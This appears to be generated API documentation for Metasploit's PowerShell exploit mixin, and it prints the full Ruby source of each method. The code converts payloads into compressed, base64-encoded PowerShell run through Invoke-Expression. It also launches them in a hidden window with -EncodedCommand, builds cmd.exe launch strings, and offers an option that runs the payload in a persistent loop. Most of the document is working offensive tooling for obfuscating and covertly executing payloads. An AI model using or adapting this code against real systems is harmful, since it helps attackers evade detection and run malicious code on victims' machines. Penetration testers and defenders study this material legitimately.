Module: Msf::Exploit::Powershell

Defined in:
lib/msf/core/exploit/powershell.rb

Instance Method Summary collapse

Instance Method Details

#build_byte_array(input_data, var_name = Rex::Text.rand_text_alpha(rand(3)+3)) ⇒ Object

Convert binary to byte array, read from file if able


159
160
161
162
163
164
165
166
167
168
169
170
171
172
# File 'lib/msf/core/exploit/powershell.rb', line 159

def build_byte_array(input_data,var_name = Rex::Text.rand_text_alpha(rand(3)+3))
  code = ::File.file?(input_data) ? ::File.read(input_data) : input_data
  code = code.unpack('C*')
  psh = "[Byte[]] $#{var_name} = 0x#{code[0].to_s(16)}"
  lines = []
  1.upto(code.length-1) do |byte|
    if(byte % 10 == 0)
      lines.push "\r\n$#{var_name} += 0x#{code[byte].to_s(16)}"
    else
      lines.push ",0x#{code[byte].to_s(16)}"
    end
  end
  psh << lines.join("") + "\r\n"
end

#cmd_psh_payload(pay, old_psh = datastore['PSH_OLD_METHOD'], wow64 = datastore['RUN_WOW64']) ⇒ Object

Creates cmd script to execute psh payload


134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
# File 'lib/msf/core/exploit/powershell.rb', line 134

def cmd_psh_payload(pay, old_psh=datastore['PSH_OLD_METHOD'], wow64=datastore['RUN_WOW64'])
  # Allow powershell 1.0 format
  if old_psh
    psh_payload = Msf::Util::EXE.to_win32pe_psh(framework, pay)
  else
    psh_payload = Msf::Util::EXE.to_win32pe_psh_net(framework, pay)
  end
  # Run our payload in a while loop
  if datastore['PERSIST']
    fun_name = Rex::Text.rand_text_alpha(rand(2)+2)
    sleep_time = rand(5)+5
    psh_payload  = "function #{fun_name}{#{psh_payload}};"
    psh_payload << "while(1){Start-Sleep -s #{sleep_time};#{fun_name};1};"
  end
  # Determine appropriate architecture
  ps_bin = wow64 ? '$env:windir+\'\syswow64\WindowsPowerShell\v1.0\powershell.exe\'' : '\'powershell.exe\''
  # Wrap in hidden runtime
  psh_payload = run_hidden_psh(psh_payload,ps_bin)
  # Convert to base64 for -encodedcommand execution
  command = "%COMSPEC% /B /C start powershell.exe -Command #{psh_payload.gsub("\n",';').gsub('"','\"')}\r\n"
end

#compress_script(script_in, eof = nil) ⇒ Object

Return a zlib compressed powershell script


76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
# File 'lib/msf/core/exploit/powershell.rb', line 76

def compress_script(script_in, eof = nil)

  # Compress using the Deflate algorithm
  compressed_stream = ::Zlib::Deflate.deflate(script_in,
    ::Zlib::BEST_COMPRESSION)

  # Base64 encode the compressed file contents
  encoded_stream = Rex::Text.encode_base64(compressed_stream)

  # Build the powershell expression
  # Decode base64 encoded command and create a stream object
  psh_expression =  "$stream = New-Object IO.MemoryStream(,"
  psh_expression << "$([Convert]::FromBase64String('#{encoded_stream}')));"
  # Read & delete the first two bytes due to incompatibility with MS
  psh_expression << "$stream.ReadByte()|Out-Null;"
  psh_expression << "$stream.ReadByte()|Out-Null;"
  # Uncompress and invoke the expression (execute)
  psh_expression << "$(Invoke-Expression $(New-Object IO.StreamReader("
  psh_expression << "$(New-Object IO.Compression.DeflateStream("
  psh_expression << "$stream,"
  psh_expression << "[IO.Compression.CompressionMode]::Decompress)),"
  psh_expression << "[Text.Encoding]::ASCII)).ReadToEnd());"

  # If eof is set, add a marker to signify end of script output
  if (eof && eof.length == 8) then psh_expression += "'#{eof}'" end

  # Convert expression to unicode
  unicode_expression = Rex::Text.to_unicode(psh_expression)

  # Base64 encode the unicode expression
  encoded_expression = Rex::Text.encode_base64(unicode_expression)

  return encoded_expression
end

#initialize(info = {}) ⇒ Object


7
8
9
10
11
12
13
14
15
16
17
18
19
# File 'lib/msf/core/exploit/powershell.rb', line 7

def initialize(info = {})
  super
  register_options(
  [
      OptBool.new('PERSIST', [true, 'Run the payload in a loop', false]),
      OptBool.new('PSH_OLD_METHOD', [true, 'Use powershell 1.0', false]),
      OptBool.new('RUN_WOW64', [
        true,
        'Execute powershell in 32bit compatibility mode, payloads need native arch',
        false
          ]),
    ], self.class)
end

#make_subs(script, subs) ⇒ Object

Insert substitutions into the powershell script


24
25
26
27
28
29
30
31
32
33
34
35
36
37
# File 'lib/msf/core/exploit/powershell.rb', line 24

def make_subs(script, subs)
  if ::File.file?(script)
    script = ::File.read(script)
  end

  subs.each do |set|
    script.gsub!(set[0],set[1])
  end
  if datastore['VERBOSE']
    print_good("Final Script: ")
    script.each_line {|l| print_status("\t#{l}")}
  end
  return script
end

#process_subs(subs) ⇒ Object

Return an array of substitutions for use in make_subs


42
43
44
45
46
47
48
49
# File 'lib/msf/core/exploit/powershell.rb', line 42

def process_subs(subs)
  return [] if subs.nil? or subs.empty?
  new_subs = []
  subs.split(';').each do |set|
    new_subs << set.split(',', 2)
  end
  return new_subs
end

#read_script(script) ⇒ Object

Read in a powershell script stored in script


54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
# File 'lib/msf/core/exploit/powershell.rb', line 54

def read_script(script)
  script_in = ''
  begin
    # Open script file for reading
    fd = ::File.new(script, 'r')
    while (line = fd.gets)
      script_in << line
    end

    # Close open file
    fd.close()
  rescue Errno::ENAMETOOLONG, Errno::ENOENT
    # Treat script as a... script
    script_in = script
  end
  return script_in
end

#run_hidden_psh(ps_code, ps_bin = 'powershell.exe') ⇒ Object

Runs powershell in hidden window raising interactive proc msg


114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
# File 'lib/msf/core/exploit/powershell.rb', line 114

def run_hidden_psh(ps_code,ps_bin='powershell.exe')
  ps_args = " -EncodedCommand #{ compress_script(ps_code) } "

  ps_wrapper = <<EOS
$si = New-Object System.Diagnostics.ProcessStartInfo
$si.FileName = #{ps_bin}
$si.Arguments = '#{ps_args}'
$si.UseShellExecute = $false
$si.RedirectStandardOutput = $true
$si.WindowStyle = 'Hidden'
$si.CreateNoWindow = $True
$p = [System.Diagnostics.Process]::Start($si)
EOS

  return ps_wrapper
end